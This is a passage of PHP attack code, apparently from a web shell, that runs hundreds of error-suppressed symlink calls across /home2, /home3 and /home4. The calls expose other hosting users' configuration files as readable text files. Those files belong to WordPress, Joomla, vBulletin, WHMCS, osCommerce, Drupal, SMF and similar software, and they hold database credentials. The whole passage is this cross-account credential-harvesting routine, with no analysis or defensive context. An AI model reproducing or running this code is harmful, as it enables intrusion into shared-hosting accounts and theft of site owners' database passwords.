'/public_html/protal/wp-config.php', $user . '-wp-protal.txt'); @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt'); @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt'); @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt'); @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt'); @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt'); @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt'); @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt'); @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt'); @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt'); @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt'); @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt'); @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt'); @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt'); @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt'); @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt'); @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt'); @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt'); @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt'); @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt'); @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt'); @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt'); @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt'); @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt'); @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt'); @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt'); @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt'); @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt'); @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt'); @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt'); @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt'); @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt'); @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt'); @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt'); @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt'); @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt'); @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt'); @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt'); @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt'); @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt'); @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt'); @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt'); @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt'); @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt'); @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt'); @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt'); @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt'); @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt'); @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt'); @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt'); @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt'); @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt'); @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt'); @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt'); @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt'); @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt'); @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt'); @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt'); @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt'); @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt'); @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt'); @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt'); @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt'); @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt'); @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt'); @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt'); @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt'); @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt'); @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt'); @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt'); @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt'); @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt'); @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt'); @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt'); @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt'); @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt'); @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt'); @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt'); @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt'); @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt'); @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt'); @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt'); @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt'); @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt'); @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt'); @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt'); @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt'); @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt'); @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt'); @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt'); @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt'); @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt'); @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt'); @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt'); @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt'); @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt'); @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt'); @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt'); @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt'); @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt'); @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt'); @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt'); @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt'); @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt'); @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt'); @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt'); @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt'); @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt'); @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt'); @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt'); @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt'); @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt'); @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt'); @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt'); @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt'); @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt'); @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt'); @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt'); @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt'); @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt'); @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt'); @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt'); @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt'); @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt'); @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt'); @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt'); @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt'); @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt'); @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt'); @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt'); @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt'); @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt'); @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt'); @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt'); @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt'); @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt'); @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt'); @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt'); @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt'); @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt'); @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt'); @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt'); @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt'); @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt'); @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt'); @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt'); @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt'); @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt'); @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt'); @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt'); @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt'); @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt'); @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt'); @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt'); @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt'); @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt'); @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt'); @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt'); @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt'); @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt'); @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt'); @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt'); @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt'); @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt'); @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt'); @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt'); @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt'); @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt'); @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt'); @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt'); @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt'); @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt'); @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt'); @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt'); @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt'); @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt'); @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt'); @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt'); @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt'); @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt'); @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt'); @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt'); @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt'); @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt'); @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt'); @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt'); @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt'); @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt'); @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt'); @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt'); @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt'); @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt'); @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt'); @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt'); @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt'); @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt'); @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt'); @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt'); @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt'); @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt'); @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt'); @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt'); @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt'); @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt'); @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt'); @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt'); @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt'); @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt'); @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt'); @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt'); @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt'); @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt'); @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt'); @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt'); @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt'); @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt'); @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt'); @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt'); @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt'); @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt'); @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt'); @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt'); @symlink('/home4/' . 